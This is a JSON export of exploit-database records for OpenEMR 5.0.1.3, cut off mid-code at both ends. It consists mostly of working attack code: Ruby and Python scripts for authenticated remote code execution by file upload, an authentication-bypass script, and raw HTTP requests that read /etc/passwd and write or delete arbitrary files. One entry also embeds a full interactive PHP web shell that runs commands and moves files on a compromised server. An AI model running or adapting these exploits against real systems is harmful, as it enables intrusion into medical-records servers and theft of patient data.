array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, 
$_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radi \n \n# Send Exploit: \nsession.post(exploit_url, headers=header, data=body) \n \n# Finish \npath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php' \nprint('[+] Webshell: ' + path) \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163110/openemr5013-shell.txt"}, {"lastseen": "2021-07-13T16:00:46", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163482", "href": "https://packetstormsecurity.com/files/163482/OpenEMR-5.0.1.3-Shell-Upload.html", "sourceData": "`# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2) \n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n# Date: 2021-07-05 \n# Vendor Homepage: https://www.open-emr.org/ \n# 
Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz \n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml \n# Version: < 5.0.1.4 (it means up to 5.0.1.3) \n# Tested on: OpenEMR Version 5.0.0.8 \n# References: https://www.exploit-db.com/exploits/49998 \n# CVE: CVE-2018-15139 \n# CWE: CWE-434 \n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485 \n \n#!/usr/bin/env ruby \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'http/form_data' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nOpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution \n \nSource: https://github.com/sec-it/exploit-CVE-2019-14530 \n \nUsage: \n#{__FILE__} exploit <url> <filename> <username> <password> [--debug] \n#{__FILE__} -h | --help \n \nOptions: \n<url> Root URL (base path) including HTTP scheme, port and root folder \n<filename> Filename of the shell to be uploaded \n<username> Username of the admin \n<password> Password of the admin \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} exploit http://example.org/openemr shell.php admin pass \n#{__FILE__} exploit https://example.org:5000/ shell.php admin pass \nDOCOPT \n \ndef login(root_url, user, pass, http) \nvuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\" \nparams = { \n'new_login_session_management' => '1', \n'authProvider' => 'Default', \n'authUser' => user, \n'clearPass' => pass, \n'languageChoice' => '1' \n} \n \nhttp.post(vuln_url, form: params).body.to_s \nend \n \ndef upload(root_url, filepath, http) \nvuln_url = \"#{root_url}/interface/super/manage_site_files.php\" \npn = Pathname.new(filepath) \n \nparams = { \nform_image: { \ncontent_type: 'application/x-php', \nfilename: pn.basename.to_s, \nbody: pn \n}, \nbn_save: 'Save' \n} \n \nres = http.post(vuln_url, form: params) \n \nreturn '[-] File not upload' unless 
(200..299).include?(res.status) \n \n\"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\" \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif args['exploit'] \nhttp = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart) \nlogin(args['<url>'], args['<username>'], args['<password>'], http) \nputs upload(args['<url>'], args['<filename>'], http) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163482/openemr5013msf-shell.txt"}], "zdt": [{"lastseen": "2018-08-17T18:21:04", "description": "Exploit for linux platform in category web applications", "cvss3": {}, "published": "2018-08-16T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - Arbitrary File Actions Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15140"], "modified": "2018-08-16T00:00:00", "id": "1337DAY-ID-30893", "href": "https://0day.today/exploit/description/30893", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions \r\n# Exploit Author: Joshua Fam\r\n# Twitter : @Insecurity\r\n# Vendor Homepage: https://www.open-emr.org/\r\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\r\n# Version: < 5.0.1.3 \r\n# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3\r\n# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140\r\n \r\n# 1.Arbitrary File Read:\r\n# In OpenEmr a user that has access to the portal can send a malcious \r\n# POST request to read arbitrary files.\r\n \r\n# i.Vulnerable Code: \r\n# if ($_POST['mode'] == 'get') {\r\n# echo file_get_contents($_POST['docid']);\r\n# exit;\r\n# }\r\n \r\n# ii. 
Proof of Concept:\r\nPOST /openemr/portal/import_template.php HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 26\r\n \r\nmode=get&docid=/etc/passwd\r\n \r\n# 2. Arbitrary File Write:\r\n# In OpenEMR a user that has access to the portal can send a malicious \r\n# POST request to write arbitrary files.\r\n \r\n# i. Vulnerable Code: \r\n# } else if ($_POST['mode'] == 'save') {\r\n# file_put_contents($_POST['docid'], $_POST['content']);\r\n# exit(true);\r\n# }\r\n \r\n# ii. Proof of Concept:\r\nPOST /openemr/portal/import_template.php HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 54\r\n \r\nmode=save&docid=payload.php&content=<?php phpinfo();?>\r\n \r\n# After sending this, navigate to payload.php at http://hostname/openemr/portal\r\n \r\n# 3. Arbitrary File Delete:\r\n# In OpenEMR a user that has access to the portal can send a malicious \r\n# POST request to delete an arbitrary file.\r\n \r\n# i. Vulnerable Code: \r\n# } else if ($_POST['mode'] == 'delete') {\r\n# unlink($_POST['docid']);\r\n# exit(true);\r\n# }\r\n \r\n# ii. 
Proof of Concept: \r\nPOST /openemr/portal/import_template.php HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n \r\nmode=delete&docid=payload.php\r\n \r\n# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.\n\n# 0day.today [2018-08-17] #", "sourceHref": "https://0day.today/exploit/30893", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-04T15:55:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2021-06-16T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (register) Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15152"], "modified": "2021-06-16T00:00:00", "id": 
"1337DAY-ID-36428", "href": "https://0day.today/exploit/description/36428", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: All versions prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15152\n# CWE: CWE-287\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit\n\n'''\nDescription:\nAn unauthenticated user is able to bypass the Patient Portal Login by simply navigating to\nthe registration page and modifying the requested url to access the desired page. Some\nexamples of pages in the portal directory that are accessible after browsing to the\nregistration page include:\n- add_edit_event_user.php\n- find_appt_popup_user.php\n- get_allergies.php\n- get_amendments.php\n- get_lab_results.php\n- get_medications.php\n- get_patient_documents.php\n- get_problems.php\n- get_profile.php\n- portal_payment.php\n- messaging/messages.php\n- messaging/secure_chat.php\n- report/pat_ledger.php\n- report/portal_custom_report.php\n- report/portal_patient_report.php\nNormally, access to these pages requires authentication as a patient. 
If a user were to visit\nany of those pages unauthenticated, they would be redirected to the login page.\n'''\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--Openemrpath', type=str)\nmy_parser.add_argument('-R', '--PathToGet', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.Openemrpath\npathtoread = args.PathToGet\n\n\n'''\nCheck for vulnerability:\n'''\n# Check, if Registration portal is enabled. If it is not, this exploit can not work\nsession = requests.Session()\ncheck_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'\ncheck_vuln = session.get(check_vuln_url).text\nprint('')\nprint('[*] Checking vulnerability: ')\nprint('')\n\nif \"Enter email address to receive registration.\" in check_vuln:\n print('[+] Host Vulnerable. 
Proceeding exploit')\nelse:\n print('[-] Host is not Vulnerable: Registration for patients is not enabled')\n\n'''\nExploit:\n'''\nheader = {\n 'Referer': check_vuln_url\n}\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread\nExploit = session.get(exploit_url, headers=header)\nprint('')\nprint('[+] Results: ')\nprint('')\nprint(Exploit.text)\nprint('')\n", "sourceHref": "https://0day.today/exploit/36428", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-12-27T13:45:44", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-14T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (manage_site_files) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139"], "modified": "2021-06-14T00:00:00", "id": "1337DAY-ID-36407", "href": "https://0day.today/exploit/description/36407", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: 
https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: Prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139\n\n'''\nDescription:\nUnrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote\nauthenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload\nform and accessing it in the images directory.\n'''\n\n\n'''\nBanner:\n'''\nbanner =\"\"\"\n ___ _____ __ __ ____ ____ ___ _ _____ \n / _ \\ _ __ ___ _ __ | ____| \\/ | _ \\ | ___| / _ \\ / | |___ / \n | | | | '_ \\ / _ \\ '_ \\| _| | |\\/| | |_) | _____ |___ \\| | | || | |_ \\ \n | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | \n \\___/| .__/ \\___|_| |_|_____|_| |_|_| \\_\\ |____(_)___(_)_(_)____/ \n |_| \n\n _____ _ _ _ \n | ____|_ ___ __ | | ___ (_) |_ \n | _| \\ \\/ / '_ \\| |/ _ \\| | __|\n | |___ > <| |_) | | (_) | | |_ \n |_____/_/\\_\\ .__/|_|\\___/|_|\\__|\n |_| \n\n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules\n'''\nimport argparse\nimport requests\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\n\n'''\nAuthentication:\n'''\n# Preparation:\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\nauth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + 
'/interface/login/login.php?site=default'\nresponse = session.get(auth_chek_url)\n\n# Header (auth):\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Referer': auth_chek_url,\n 'Upgrade-Insecure-Requests': '1',\n}\n\n# Body (auth):\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authentication:\nprint('')\nprint('[+] Authentication')\nauth = session.post(auth_url,headers=header, data=body)\n\n\n'''\nExploit:\n'''\nprint('')\nprint('[+] Uploading Webshell:')\n\n# URL:\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php'\n\n# Headers (Exploit):\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------31900464228840324774249185339\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Referer\": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php',\n \"Upgrade-Insecure-Requests\": \"1\"\n}\n\n# Body (Exploit):\nbody = \"-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: 
form-data; name=\\\"form_filedata\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"MAX_FILE_SIZE\\\"\\r\\n\\r\\n12000000\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_image\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 
'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>[email\u00a0protected]:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) 
{\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n 
featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? 
currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"[email\u00a0protected]:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) 
